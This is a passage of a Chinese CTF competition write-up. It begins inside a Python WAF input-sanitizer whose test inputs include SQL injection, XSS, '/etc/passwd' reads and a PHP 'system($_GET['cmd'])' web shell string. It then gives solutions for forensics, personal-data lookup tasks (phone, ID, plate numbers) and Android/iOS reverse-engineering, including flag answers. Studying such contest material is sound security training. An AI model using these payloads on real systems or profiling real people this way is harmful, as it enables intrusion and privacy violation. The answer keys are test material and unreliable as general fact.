        :param input_str: 输入字符串
        :param max_length: 最大允许长度(可选)
        :return: 清理后的字符串
        """
        ifnot input_str:
            return input_str

        # 长度限制
        if max_length isnotNoneand len(input_str) > max_length:
            input_str = input_str[:max_length]

        # 移除HTML标签
        sanitized = re.sub(r'<[^>]*>', '', str(input_str))
        # 转义特殊字符
        sanitized = (
            sanitized.replace("'", "&#39;")
            .replace('"', "&#34;")
            .replace("<", "&lt;")
            .replace(">", "&gt;")
            .replace("\", "\\")
        )
        return sanitized

# 示例用法
if __name__ == "__main__":
    import datetime

    # 初始化WAF
    waf = WAF(strict_mode=True, enable_logging=True)

    # 添加自定义规则
    waf.add_custom_rule('php_attack', r'<?php.*??>', 'PHP代码注入')

    # 测试输入
    test_inputs = [
        "admin' OR '1'='1",
        "<script>alert('XSS')</script>",
        "cat /etc/passwd; ls -la",
        "../../../etc/passwd",
        "normal input",
        "password=123456",
        "<?php system($_GET['cmd']); ?>",
    ]

    for test in test_inputs:
        print(f"n测试输入: {test}")
        results = waf.detect_all(test)

        if results['is_malicious']:
            print("  [!] 检测到恶意输入!")
            for rule, (detected, pattern) in results.items():
                if detected and rule != 'is_malicious':
                    print(f"    - {rule}: {pattern}")
        else:
            print("  [√] 输入安全")

    # 查看攻击日志
    print("n攻击日志:")
    for log in waf.get_attack_log():
        print(f"[{log['timestamp']}] {log['type']}: {log['pattern']} (输入: {log['input']})")

数据分析题

1、溯源与取证题目1

FTK挂载得到重要文件.docx

下载打开排查一遍发现重要字符串：

得到答案：

b1e9517338f261396511359bce56bf58

2、溯源与取证题目2

上一题FTK还有内存.7z文件，解压之后开始翻，翻到对应网页流量ip

得到答案：

114.10.143.92

3、数据社工任务1

要找的是居住地和公司，根据其他任务已经知道了公司，要找的只有居住地，根据手机号等很容易在打车数据里面找到相关经纬度，从而在地图数据中找到小区。

得到答案：

华润国际E区:闵行区星辰信息技术园

4、数据社工任务2

要求找公司名称，通过任务3知道了手机号，在快递单中查找知道了是什么博林科技的

写个python脚本在工商登记数据里找博林

import openpyxl
import os

def find_string_in_multiple_excels(folder_path, target_string):
    """
    遍历多个 Excel 文件，查找目标字符串。
    
    :param folder_path: 包含 Excel 文件的文件夹路径
    :param target_string: 要查找的目标字符串
    :return: 打印匹配结果
    """
    try:
        # 存储匹配结果
        results = []

        # 遍历 data0.xlsx 到 data99.xlsx
        for i in range(100):  # 从 0 到 99
            file_name = f"data{i}.xlsx"
            file_path = os.path.join(folder_path, file_name)

            # 检查文件是否存在
            ifnot os.path.exists(file_path):
                print(f"文件不存在: {file_path}")
                continue

            print(f"正在检查文件: {file_name}")

            # 加载 Excel 文件
            workbook = openpyxl.load_workbook(file_path)
            
            # 遍历所有工作表
            for sheet_name in workbook.sheetnames:
                sheet = workbook[sheet_name]

                # 遍历工作表中的每个单元格
                for row in sheet.iter_rows():
                    for cell in row:
                        if cell.value and target_string in str(cell.value):
                            # 如果找到目标字符串，记录文件名、工作表名称、单元格位置和内容
                            result = {
                                "文件名": file_name,
                                "工作表": sheet_name,
                                "单元格位置": cell.coordinate,
                                "单元格内容": cell.value
                            }
                            results.append(result)
                            print(f"找到匹配项 - 文件: {file_name}, 工作表: {sheet_name}, 单元格: {cell.coordinate}, 内容: {cell.value}")

        # 输出最终结果
        ifnot results:
            print("未找到匹配的字符串。")
        else:
            print("n=== 查找结果 ===")
            for res in results:
                print(f"文件: {res['文件名']}, 工作表: {res['工作表']}, 单元格: {res['单元格位置']}, 内容: {res['单元格内容']}")

    except Exception as e:
        print(f"发生错误: {e}")

# 示例用法
if __name__ == "__main__":
    # 输入包含 Excel 文件的文件夹路径
    folder_path = input("请输入包含 Excel 文件的文件夹路径: ").strip()
    search_string = input("请输入要查找的字符串: ").strip()

    # 调用函数进行查找
    find_string_in_multiple_excels(folder_path, search_string)

得到答案：

江苏博林科技有限公司

5、数据社工任务3

要找手机号，已知姓名，去爬取的网页中找

得到答案：

13891889377

6、数据社工任务4

要找身份证号，已知手机号，仍然去爬取的网页中找

得到答案：

61050119980416547X

7、数据社工任务5

要车牌号，已知手机号，去停车场数据中找，手动硬找，总能找到:)

578.jpg

得到答案：

浙B QY318

8、数据攻防任务1

分析流量发现后面有大量的部分是在进行布尔盲注，把注入得到的结果还原出来就好

得到答案：

f84c4233dd185ca3c083c7b3dbc4ff8b

app安全题

1、偷天换日

JNI_OnLoad中的函数解密了一个dex

使用frida dump出dex

根据dex中的逻辑发现是base58加密

得到flag

flag{j#n$j@m^,*2}

2、GoodLuck

有混淆，用jeb查看代码

发现有md5常数，猜测直接是md5

在线得到flag

flag{r9d3jv4}

3、babyapk

baby_xor函数在so层

用给的key解密发现一直不对，也没找到交叉引用

init_array找到修改点

c=[119, 9, 40, 44, 106, 84, 113, 124, 34, 93, 122, 121, 119, 4, 120, 124, 36, 7, 127, 42, 117, 6, 112, 41, 32, 4, 112, 47, 119, 81, 123, 47, 33, 81, 40, 120, 114, 24]
c1=[0x11,0x65, 0x49, 0x4b]
for i in range(len(c)):
 c[i]^=c1[i%len(c1)]
 print(chr(c[i]),end="")

得到flag:

flag{1873832fa175b6adc9b1a9df42d04a3c}

4、IOSApp

ida查字符串

re人的敏感肌，gmbh-flag

include <stdio.h> 
include <string.h> 
int main() {
char cipher[] = "gmbh|zpv mppljoh gps `nf~";
char plain[strlen(cipher) + 1]; // +1用于空终止符

for (int i = 0; i < strlen(cipher); i++) { 
  plain[i] = cipher[i] - 1; // 每个字符ASCII值减1
 }
 plain[strlen(cipher)] = ''; // 添加字符串终止符
printf("%sn", plain); // 输出解密结果
return0;
}

得到flag：

flag{you_looking_for_me}

5、这个木马在干啥

frida一把梭哈

Java.perform(function () {
    var MainActivity = Java.use("com.ctf.backdoor.MainActivity");
    var str = "ezAGDYwENV/al9r0udClbQ==";
    var result = MainActivity.ooxx(str);
    console.log(result);
});

如图拿才学的frida梭哈了，只有轻薄本有环境，高超的拍屏技巧

6、Privacy Master（1）

主函数里找到

READ_PHONE_STATE,ACCESS_FINE_LOCATION

7、Privacy Master（3）

答案 1,10,16,20,22

问题1合规：代码通过 showPrivacyPolicyDialog 弹窗明确第三方数据共享场景，但未在共享逻辑处添加具体场景说明

问题10违规： noteDao.getAllNote() 和noteDao.getBackUpNote() 未体现不同类型数据存储周期差异

问题16部分合规：设置菜单通过 setting_ menu 跳转，但撤回路径缺少操作指引说明

问题20违规：隐私弹窗仅提供邮箱渠道，未实现应用内撤回功能

问题22合规： onResume() 方法实时检测政策更新，但生效时间定义缺失时间戳记录根据如下隐私政策存在的问题，回答APP的隐私政策存在哪几条问题，回答序号，从小到大排列，英文逗号分隔。（问题项在于涉及到且不合规，政策中没提到的不算违规，请注意提交次数限制）

未明确说明与第三方共享数据的具体场景
未区分匿名化信息与个人信息的共享规则
未说明跨境数据传输的具体情况
未列明可能涉及的第三方合作伙伴类型
未说明共享数据后的责任划分
未提及商业并购等特殊场景下的数据转移
未说明基于法律要求的共享情形
未说明共享数据的最小必要原则数据存储相关问题（7项）：
未明确具体存储期限的计算标准
未区分不同数据类型对应的存储期限
未说明数据销毁的具体流程和验证方式
未明确跨境存储的地理位置说明
未说明存储期限届满后的处理机制
未提供存储期限变更的通知方式
未说明备份数据的保留规则

用户权限相关问题（6项）：

未说明撤回授权的具体操作路径
未明确撤回请求的处理时效
未提及撤回权限可能影响的服务功能
未说明身份验证的具体方式
未提供除邮箱外的其他撤回渠道
未说明撤回授权的例外情形

政策更新相关问题（6项）：

未明确更新后的生效时间节点
未说明重大变更的特别提示方式
未提供历史政策版本的查询途径
未定义"重大变更"的具体标准
未说明用户不同意更新的处理方案
未明确更新通知的推送渠道

8、Harmony

https://github.com/ohos-decompiler/abc-decompiler/releases

goodgood16f85293e920fd49eda6bf0df98bfd33 md5一下

得到flag：

flag{ee51e080d1db85f9927fe87aa92267bb}

文末:

欢迎师傅们加入我们:

星盟安全团队纳新群1:222328705

星盟安全团队纳新群2:346014666

有兴趣的师傅欢迎一起来讨论!

PS:团队纳新简历投递邮箱：

[email protected]

责任编辑：@Elite

原文始发于微信公众号（星盟安全）：数字中国创新大赛-数字安全赛道 Writeup

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

数据安全题

1、AS

2、scsc

3、ez_upload

5、Boh

7、RSSA

模型安全题

1、 数据预处理 任务1

2、数据预处理 任务2

3、数据预处理 任务3

数据分析题

1、溯源与取证 题目1

2、溯源与取证 题目2

3、数据社工 任务1

4、数据社工 任务2

5、数据社工 任务3

6、数据社工 任务4

7、数据社工 任务5

8、数据攻防 任务1

app安全题

1、偷天换日

2、GoodLuck

3、babyapk

4、IOSApp

5、这个木马在干啥

6、Privacy Master（1）

7、Privacy Master（3）

8、Harmony

发表评论

在线咨询

微信

1、数据预处理任务1

2、数据预处理任务2

3、数据预处理任务3

1、溯源与取证题目1

2、溯源与取证题目2

3、数据社工任务1

4、数据社工任务2

5、数据社工任务3

6、数据社工任务4

7、数据社工任务5

8、数据攻防任务1